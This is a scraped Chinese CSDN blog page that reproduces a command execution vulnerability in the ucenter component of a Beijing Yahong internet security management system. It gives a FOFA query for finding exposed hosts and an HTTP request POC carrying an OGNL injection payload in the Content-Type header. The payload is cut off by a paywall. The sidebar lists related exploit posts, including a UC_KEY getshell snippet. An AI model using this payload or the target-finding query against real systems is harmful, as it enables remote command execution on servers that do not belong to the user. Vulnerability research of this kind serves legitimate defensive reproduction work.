北京亚鸿世纪互联网信息安全综合管理系统ucenter命令执行

最新推荐文章于 2024-04-26 16:45:00 发布
最新推荐文章于 2024-04-26 16:45:00 发布
阅读量55 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136523461
版权

漏洞概述

北京亚鸿世纪互联网信息安全综合管理系统 ucenter 存在命令执行漏洞。

复现环境

fofa-qeury: /ucenter/js/jquery.js

漏洞复现

POC

GET /ucenter/js/index.js HTTP/1.1
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{
  {rce}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
weixin_72543266的博客
04-22 1235
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
漏洞复现-DiscuzX 系列全版本后台SQL注入漏洞
qq_59350385的博客
05-10 1516
目录 环境搭建 (1)源码下载: 漏洞检测 报错注入 写文件 漏洞分析 环境搭建 (1)源码下载: https://search.gitee.com/?skin=rec&type=repository&q=discuz git clonehttp://htts://gite.com/ComsenzDiscuzX.git 放置于web根目录,访问即可进入安装页面 (2)也可搭建vulhub靶场,启动discuz环境 漏洞检测 http://.....
discuz api uc.php 漏洞,解读Discuz论坛程序中UCenter致命性UC_KEY漏洞
weixin_36146811的博客
03-18 998
Discuz早已是朋友家喻户晓的程序了,几乎所有玩过论坛的朋友都或多或少知道它,但也因为这么大的平台(腾讯旗下品牌)也有着很严重的安全漏洞。所以以下图为例为大家展示一下!希望能够对大家有所帮助!Kiscu!是知名的开源论坛建站程序,在国内有着庞大的用户群体,一旦发生安全漏洞,做网站受影响网站将不计其数。有白帽发现Kiscuz!程序存在一个安全bug,在得知UC_KEY的情况下,可以轻松向站点写入后...
MKcms漏洞合集
最新发布
2301_80115097的博客
04-26 600
MKCMS5.0是一款基于PHP+MYSQL开发制作的专业全自动采集电影网站源码。程序不需授权上传直接使用,自动更新电影,无人值守!完整的会员影视中心 后台可对接卡盟 可以设置收费观看模式。下载地址:链接:https://pan.baidu.com/s/12HsPtKN8ECIAv3QNy6rSwg提取码:zkaq源码放在phpstudy根目录下。访问:http://127.0.0.1/MKCMS5.0/install/
Ucenter Home SQL注入漏洞详细分析(需要GPC=OFF)
收集盒 Book box
05-16 1792
SQL Injection 1: 漏洞在文件\source\cp_profile.php <?php // .......省略....... //性别 $_POST['sex'] = intval($_POST['sex']); if($_POST['sex'] && empty($s
关于Discuz! X系列远程代码执行漏洞
weixin_34306676的博客
11-16 510
一、漏洞起源 突然有同事反馈,无法注册   看到这里不了解的同行估计一年懵逼,这里也是常用的漏洞攻击,可以肯定的是  badwords.php文件被修改了 ,可以查看这个文件内容 &lt;?php $_CACHE['badwords'] = array ( 'findpattern' =&gt; array ( 'balabala' =&gt; '/.*/...
伊比音乐网站管理系统整合UC版 v1.3.2.zip
06-19
伊比音乐网站管理系统整合UC版 v1.3.2 是一款专为音乐类网站设计的管理系统,它集成了UCenter(UC)的功能,使得网站的用户管理、社区互动以及数据同步更加便捷。在这个版本中,系统针对用户体验和功能优化进行了...
2022最新版Thinkphp6内核_多微信管理系统源码
04-20
安装教程 ... 第一步:下载源码压缩包解压到你的项目根目录 第二步:绑定到项目中的public目录为运行目录 ... 第四步:将根目录的thinkphp6.sql文件导入数据库...所有的使用方法参考app\admin\controller\ucenter\User.php
php168 v6分类信息整合ucenter同步登录,同步退出解决方案
09-28
UCenter作为整合用户的这样一个开源插件,对于PHP开发的,甚至其它开发语言如.net,java.asp等开发人员解决多个项目整合到一起,用户进行同步登录,同步退出等,同步消息等都是非常有用的。下面分享下以前整合项目中...
UCenter前端界面和后端管理系统
04-19
此压缩包包括UCenter(前端)及UCenter_home(后台)。可在自己的服务器上架构起简单BBS系统。 提供同步登录、退出、注册等相关接口,可以实现用户一个账号,在一处登录,全站通行。 提供短消息相关接口,可以实现...
最土团购系统整合ucenter详细步骤说明[修正版]
09-28
最土团购系统整合ucenter的过程涉及到了网站应用的集成与数据同步,这在多平台运营时经常遇到,目的是为了统一用户账号,便于管理和提升用户体验。以下是对整个整合过程的详细说明: 首先,需要确保你已经拥有最土...
UCenter_1.6.0最新版本
03-07
UCenter_1.6.0最新版本 utf-8编码
discuz7.2sql注入漏洞
weixin_40709439的博客
09-20 8295
今天尝试了discuz7.2动力论坛的sql注入漏洞 原因是由faq.php文件源码存在漏洞引起的 下载官方discuz7.2源码,在本地搭建漏洞环境 http://www.comsenz.com/downloads/install/discuz 下载的三个文件 利用http://localhost:8088/discuz72/upload/install/index.php进行安装...
payload sql注入_【安全通报】Discuz! X后台SQL注入漏洞安全风险公告
weixin_39531688的博客
12-20 200
↑ 点击上方蓝色字关注我们近日,Discuz! X的管理员后台SQL注入具体利用细节被披露。Discuz! 是一套基于PHP+MYSQL开发的通用性社区论坛软件系统,在国内备受用户喜爱,用户量较大。该漏洞成因是由于将appid值写入配置文件config_ucenter.php之中未进行严格的过滤。在页面刷新的时,会将config_ucenter.php中的UC_APPID取出,并拼接进S...
Discuz的利用UC_KEY进行getshell
u013473481的专栏
01-14 1379
<?php // 代码版权归原作者所有! $timestamp = time()+10*3600; $host="127.0.0.1"; $uc_key="eapf15K8b334Bc8eBeY4Gfn1VbqeA0N5Waofq6J285Ca33i151e551g0l9f2l3dd"; $code=urlencode(_authcode("time=$timest
Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破
热门推荐
weixin_40966980的博客
01-03 2万+
这里有个验证码的地址,为:http://localhost/uc_server/admin.php?m=seccode&seccodeauth=07d4kVIZ%2Fj5pecd%2Bv7%2FuE0zfvj%2FKRIrF3pmAd%2BupYhm4GT4&1104676922 验证码一直是 cccc 应该是每个ip第一次访问的话都是这个,所以可以用来爆破
“不一样”的真实渗透测试案例分析
HBohan的博客
07-26 2513
前言 本文是由一次真实的授权渗透案例引申而出的技术分析和总结文章。在文章中我们会首先简单介绍这次案例的整体渗透流程并进行部分演绎,但不会进行详细的截图和描述,一是怕“有心人”发现端倪去目标复现漏洞和破坏,二是作为一线攻击人员,大家都明白渗透过程也是一个试错过程,针对某一个点我们可能尝试了无数种方法,最后写入文章的只有成功的一种,而这种方法很有可能也是众所周知的方法。因此我们只会简单介绍渗透流程,然后提取整个渗透过程中比较精华的点,以点及面来进行技术分析和探讨,望不同的人有不同的收获。 白嫖的福音网安学习资.
ucenter拿到key渗透方法
cnbird's blog
10-11 3697
http://www.wooyun.org/bugs/wooyun-2010-034737
ucenter for java api 对接,实现用户统一管理实例
01-10
ucenter 是一个用于用户统一管理的平台,通常情况下,我们会通过 ucenter 的 API 接口来实现对接。 对接 ucenter 的过程通常分为以下几个步骤: 1. 首先,你需要准备好 ucenter 的 API 接口文档,这样你才能知道...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值